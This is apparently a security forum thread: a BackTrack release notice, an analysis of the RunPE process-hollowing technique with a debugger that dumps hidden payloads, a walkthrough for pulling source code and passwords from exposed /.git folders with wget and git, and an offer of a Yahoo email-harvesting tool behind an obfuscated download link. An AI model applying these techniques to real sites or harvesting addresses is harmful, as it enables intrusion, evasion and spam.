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  1. The BackTrack Development team will be releasing an R3 revision of our Penetration Testing distribution in 2 weeks. This release focuses on bugfixes and over 50 new tool additions – making it the most potent revision yet. We have released a BT5 R3 preview in BlackHat Vegas for the enjoyment of conference attendees, which can be found in their delegate bags. The DVD contains a BT5 R3 Gnome, 32 bit edition – burnt as an ISO (as opposed to an image). We will be taking in our last bug reports and tool suggestions from the BH / Defcon crowds for our upcoming official release, which will be on August 13th, 2012. Current BT5 users can simply upgrade to the latest release using the regular update commands. More details will be released along with the full listing of new tools on the 13th of August. We hope you enjoy this fine release as much as we do! Sursa: BackTrack 5 R3 Release - Aug 13th, 2012
    1 point
  2. RunPE in a nutshell RunPE is a technique often used by (novice) virus authors to hide their viruses from an anti-virus scanner. It works by using a small launcher application that has the executable virus file embedded in an encrypted state. The easiest way to launch the executable would be to write a decrypted version of the virus to a file, but this would give the anti-virus scanners a chance to detect and subsequently disable it. Instead, the RunPE loader runs an innocent application and replaces its loaded process image with the virus. To understand the reasoning in the rest of the document, it's important that you understand how running a process from a memory buffer works from a technical point of view. First, the RunPE loader launches an innocent process using the CreateProcess API. The process is launched using the CREATE_SUSPENDED flag. This will suspend the process right after it is mapped into memory, but before the windows PE loader loads all additional library files. Next, the RunPE loader calls GetThreadContext on the main thread of the newly created process. The returned thread context will have the state of all general purpose registers. The EBX register holds a pointer to the Process Environment Block (PEB), and the EAX register holds a pointer to the entry point of the innocent application. In the PEB structure, at an offset of eight bytes, is the base address of the process image. The loader calls NtUnmapViewOfSection. This function will unmap all the mapped sections of the innocent executable, freeing up the memory space for the virus to be mapped in. Then the loader reads the headers of the decrypted virus, and maps the headers and all sections into the innocent process using WriteProcessMemory. The correct memory page permissions are set using VirtualProtectEx. The loader writes the new base address into the PEB and calls SetThreadContext to point EAX to the new entry point. Finally, the loader resumes the main thread of the target process with ResumeThread and the windows PE loader will do it's magic. The executable is now mapped into memory without ever touching the disk. Plan of attack The weaknesses of RunPE should be obvious to anyone: At some point the loader has to decrypt the excutable in the loader's memory space. Furthermore, the original executable will be mapped in the target process' memory space in a readable state, you can easily dump the executable into a file. My first instinct was to try OllyDBG with the OllyDump plugin. Sadly, the RunPE loader left the process in a mutilated state, causing the plugin to fail. Another way to solve the problem would be forcing the RunPE loader to write the executable to a file instead of to the memory space of another process. The easiest way to achieve this is by hooking the WriteProcessMemory calls. You have to place the hooks before the RunPE loader ever gets control of execution, this proved to be quite challenging when the RunPE loader is written in a .NET language (and it often is, the people using this technique usually aren't very good at what they do). To solve this I decided to create my own debugger application that places an int3 breakpoint on WriteProcessMemory and reads the required data straight from the RunPE loader process with ReadProcessMemory. The Source The code I have so far does its job but is quite dirty. There is no real design behind it, I just started coding and fixing stuff as I thought about it. It also doesn't yet create a real decrypted executable but instead creates binary files for each WriteProcessMemory call. I haven't tested how anti debugger techniques react on this debugger yet. IsDebuggerActive() will return true for sure, but that can easily be prevented. How it reacts on tricks with exception handlers is something I have to test. I'd like to eventually expand this code to some sort of simple debugger framework where you can execute callback functions for every breakpoint. Not sure if I'll ever be motivated enough though. C:\>debugger.exe target.exe Process target.exe Loaded at 00400000 Handling exception chain... Unknown Breakpoint at 7C90120E Creating breakpoint (WriteProcessMemory) at 7C802213 Handling exception chain... Exception at 7C812AFB type 4242420 Handling exception chain... Breakpoint (WriteProcessMemory) at 7C802213 getting stack... WriteProcessMemory was called at address 4000000 on buffer b3adf8 with length 14 Process closed with exit code 0 C:\>cat 4000000.bin Hello this is a test C:\> #include <iostream> #include <string> #include <map> #include <vector> #include <iomanip> #include <sstream> #include <algorithm> #include <functional> #include <fstream> #include <Windows.h> #include <TlHelp32.h> typedef void (*BreakpointCallback)(HANDLE proc, HANDLE thread); struct Breakpoint { std::string name; unsigned char originalBytes[2]; BreakpointCallback callback; // Not yet used }; typedef std::map<std::string, MODULEENTRY32> ModuleMap; typedef std::map<void *, Breakpoint> BreakMap; bool DumpDataToFile(HANDLE proc, DWORD address, DWORD bufferAddress, DWORD length) { std::stringstream filename; filename << std::hex << address << ".bin"; std::ofstream outfile(filename.str(), std::ofstream::binary | std::ofstream::trunc); char *buffer = new char[length]; ReadProcessMemory(proc, reinterpret_cast<void *>(bufferAddress), buffer, length, NULL); outfile.write(buffer, length); delete[] buffer; return false; } bool UpdateModuleList(int pid, ModuleMap& moduleList) { HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid); if(snap == INVALID_HANDLE_VALUE) return false; MODULEENTRY32 me; moduleList.clear(); Module32First(snap, &me); do { std::string key = me.szModule; std::transform(key.begin(), key.end(), key.begin(), std::ptr_fun<int, int>(tolower)); moduleList[key] = me; } while (Module32Next(snap, &me)); return true; } // I only place breakpoints on WINAPI functions so I write 2 bytes: // mov edi,edi becomes int3 // nop // so I don't need to do anything special to handle the breakpoint, it will just continue with the nop // and then follow the function prologue bool ToggleInt3Breakpoint(void *address, std::string name, BreakMap& breakList, HANDLE proc) { BreakMap::iterator bpit = breakList.find(address); if(bpit != breakList.end()) { // Rewove existing BP std::cout << "Removing breakpoint (" << bpit->second.name << ") at " << address << std::endl; if(!WriteProcessMemory(proc, address, bpit->second.originalBytes, 2, NULL)) return false; breakList.erase(address); } else { // Create new BP Breakpoint bp = {name, 0, 0, NULL}; std::cout << "Creating breakpoint (" << name << ") at " << address << std::endl; if(!ReadProcessMemory(proc, address, bp.originalBytes, 2, NULL)) return false; if(!WriteProcessMemory(proc, address, "\xCC\x90", 2, NULL)) return false; breakList[address] = bp; } return true; } bool PlaceBreakpoints(ModuleMap& moduleList, BreakMap& breakList, HANDLE proc) { ModuleMap::iterator kernel32 = moduleList.find("kernel32.dll"); if(kernel32 != moduleList.end()) { void *wpmAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory"); ToggleInt3Breakpoint(wpmAddress, "WriteProcessMemory", breakList, proc); return false; } else return true; } bool GetStack(int slots, HANDLE thread, HANDLE proc, std::vector<DWORD>& stack) { CONTEXT context; context.ContextFlags = CONTEXT_ALL; std::cout << "getting stack..." << std::endl; if(!GetThreadContext(thread, &context)) return false; for(int i = 0; i < slots; i++) { DWORD slot; if(!ReadProcessMemory(proc, reinterpret_cast<void *>(context.Esp + (i * 4)), &slot, sizeof(DWORD), NULL)) return false; stack.push_back(slot); } return true; } // We handle the breakpoints here (and potential other exceptions) void HandleException(DEBUG_EVENT de, BreakMap& breakList, HANDLE proc) { std::cout << "Handling exception chain... " << std::endl; EXCEPTION_RECORD *exception = &de.u.Exception.ExceptionRecord; do { BreakMap::iterator bp = breakList.find(exception->ExceptionAddress); if(exception->ExceptionCode == EXCEPTION_BREAKPOINT && bp != breakList.end()) { std::cout << " Breakpoint (" << bp->second.name << ") at " << exception->ExceptionAddress << std::endl; if(bp->second.name == "WriteProcessMemory") { std::vector<DWORD_PTR> stack; HANDLE thread = OpenThread(THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION, false, de.dwThreadId); GetStack(6, thread, proc, stack); CloseHandle(thread); std::cout << "WriteProcessMemory was called at address " << stack[2] << " on buffer " << stack[3] << " with length " << stack[4] << std::endl; DumpDataToFile(proc, stack[2], stack[3], stack[4]); } } else if(exception->ExceptionCode == EXCEPTION_BREAKPOINT) std::cout << " Unknown Breakpoint at " << exception->ExceptionAddress << std::endl; else { std::cout << " Exception at " << std::hex << exception->ExceptionAddress << " type " << exception->ExceptionCode << std::endl; MessageBeep(0); Sleep(100); } } while (exception = exception->ExceptionRecord); } int DebugMain(std::string targetPath) { STARTUPINFO si = {0}; si.cb = sizeof(si); PROCESS_INFORMATION pi; if(!CreateProcess(targetPath.c_str(), NULL, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, ?)) { std::cerr << "Error while creating process: " << GetLastError() << std::endl; return EXIT_FAILURE; } DEBUG_EVENT de; bool keepLooping = true; bool needBreakpoints = true; ModuleMap moduleList; BreakMap breakList; while(keepLooping && WaitForDebugEvent(&de, INFINITE)) { switch(de.dwDebugEventCode) { case LOAD_DLL_DEBUG_EVENT: case UNLOAD_DLL_DEBUG_EVENT: UpdateModuleList(pi.dwProcessId, moduleList); break; case CREATE_PROCESS_DEBUG_EVENT: std::cout << "Process " << targetPath << " Loaded at " << de.u.CreateProcessInfo.lpBaseOfImage << std::endl; break; case EXIT_PROCESS_DEBUG_EVENT: std::cerr << "Process closed with exit code " << std::hex << de.u.ExitProcess.dwExitCode << std::endl; keepLooping = false; break; case EXCEPTION_DEBUG_EVENT: HandleException(de, breakList, pi.hProcess); break; default: break; } // Place breakpoints as soon as kernel32 is loaded if(needBreakpoints) needBreakpoints = PlaceBreakpoints(moduleList, breakList, pi.hProcess); ContinueDebugEvent(de.dwProcessId, de.dwThreadId, DBG_CONTINUE); } return EXIT_SUCCESS; } int main(int argc, char **argv) { if(argc != 2) { std::cerr << "Usage: " << argv[0] << " <executable path>" << std::endl; return EXIT_FAILURE; } return DebugMain(argv[1]); } Sursa: https://thunked.org/programming/decrypting-runpe-malware-t110.html
    1 point
  3. When you pentest a website an it's ok to "make a lot of noise" you can use the nmap script at http-enum.nse , that basicaly uses another script http-fingerprints.lua to find any common folders on a system, bruteforce but works. This most of the time returs folders like admin, tmp and others, but the one in particular we will discuss right now is the /.git folder. Now we need to get the /.git folder. Using git clone to download the sources will fail, so since directory listing is turned on we can download it using wget. $ mkdir git-test $ cd git-test $ wget --mirror --include-directories=/.git http://www.target.com/.git That'll take some time, depending on the size of the repository. When it's all done, go into the folder that wget created and use git --reset: $ cd www.site.com $ git reset --hard HEAD is now at [...] Then look around - you have their entire codebase! $ ls db doc robots.txt scripts test Browse this for interesting scripts (like test scripts?), passwords, configuration details, deployment, addresses, and more! You just turned your blackbox pentest into a whitebox one, and maybe you got some passwords in the deal! You can also use "git log" to get commit messages, "git remote" to get a list of interesting servers, "git branch -a" to get a list of branches, etc. Why does this happen? When you clone a git repository, it creates a folder for git's metadata - .git - in the folder where you check it out. This is what lets you do a simple "git pull" to get new versions of your files, and can make deployment/upgrades a breeze. There are a few ways to prevent this: Remove the .git folder after you check it out Use a .htaccess file (or apache configuration file) to block access to .git Keep the .git folder one level up - in a folder that's not available to the Web server Use a framework - like Rails or .NET - where you don't give users access to the filesystem Finding this in an automated way You can quickly scan an entire network by using a command like: nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git <target> The output for an affected host will look something like: PORT STATE SERVICE 80/tcp open http | http-git: | Potential Git repository found at (found 5 of 6 expected files) | Repository description: Unnamed repository; edit this file 'description' to name the... | Remote: https://github.com/skullspace/skullspace.ca.git |_ -> Source might be at https://github.com/skullspace/skullspace.ca Credits: SkullSecurity ? Blog Archive ? Using "Git Clone" to get Pwn3D
    1 point
  4. Salutare baieti. Din dorinta de a ma familiariza cu un mediu de programare, am facut o mica aplicatie: Aplicatia cauta pe net mailuri @yahoo. Aproximativ 90% sunt mailuri romanesti. In teorie, toate ar trebui sa fie valide, dar probabil exista 1-2% mailuri invalide. - gaseste aproximativ 400 mailuri/10 minute, cu variatii destul de mari in functie de ora din zi in care se face scanarea; - nu adauga mailuri duplicate; - lasat in bara, nu forjeaza procesorul peste 5% (testat pe un core2duo @2.4Ghz), deci merge lasat sa scaneze cand voi va faceti alte treburi; - are buton de ordonare alfabetica a listei de mailuri - buton de salvare a listei intr-un fisier text, cate un mail pe linie (da append) Zilele urmatoare voi mai imbogati aplicatia si cu alte functionalitati, dar am nevoie de ceva feedback de la voi. Orice bug descoperit, va rog sa-l raportati. Voi mari signifiant viteza de scanare, dar e destul de bine si asa pentru o aplicatie free. Chestii tehnice: - realizat in VS 2010, framework 4 - C#, WPF - testat cu succes pe un win7 x86; - aero activat ofera un mic avantaj la rulare; Link de download: d3d3Lkx4NjNMaVhhbm1iVm54d2FmakJMU0prR2JmQVVndDZxS0gwelQ1M3NwSUJEK0hCcUtnSFFueGhvZnhrZlN5WGFIeDZKVGhUUGZ5aFlINUxMS3hyNUFoaG1RZlRHUWZURw== Hint: Base e atomputernic! oarecum Parola: TheTime4RST Voi reveni zilele astea cu versiuni imbogatite. Daca vi se pare util, se poate pune o sigla a RST-ului si mutat la RST Power. Rep, Like daca va este de folos, injurati-ma de pisica si de bunica daca v-am irosit timpul sau daca ati avut o zi proasta.
    -1 points
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